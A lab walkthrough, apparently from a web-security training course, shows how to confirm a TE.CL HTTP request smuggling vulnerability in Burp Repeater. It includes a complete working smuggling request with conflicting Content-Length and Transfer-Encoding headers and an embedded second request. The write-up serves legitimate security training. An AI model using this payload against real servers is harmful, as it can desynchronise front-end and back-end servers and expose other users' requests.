Lab: HTTP request smuggling, confirming a TE.CL vulnerability via differential responses

After starting the exercise, the blog will look similar to the one shown in the illustration.

We switch to Burp Suite and open Burp Proxy there. In Burp Proxy, we open the HTTP history tab and search for a request in the form GET / HTTP/1.1. We send this request to Burp Repeater using the key combination CTRL + R and switch to Burp Repeater.

In Burp Repeater, we disable the Update Content-Length function in the Burp menu.

Now let's make a few changes to the request. First, we change the HTTP verb from GET to POST. Then we remove all headers except Host, Content-Type, User-Agent and Content-Length and add the Transfer-Encoding header with the value chunked at the end. Now press the ENTER key twice and enter the length of the second request in hexadecimal: 5e. Now add the following request.

POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

At the end of the second request, after the 0, press the ENTER key twice. The complete request looks like this:

POST / HTTP/1.1
Host: 0a4900360342c7cd81f76382005b0073.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 4

5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

We send the request twice to the application, and the second request should receive an HTTP/1.1 404 Not Found response. With this response, we have successfully completed the exercise.

Video solution

PreviousLab: HTTP2 request splitting via CRLF injection NextLab: Bypassing access controls via HTTP2 request tunnelling

Last updated 1 month ago

hashtagVideo solution

Video solution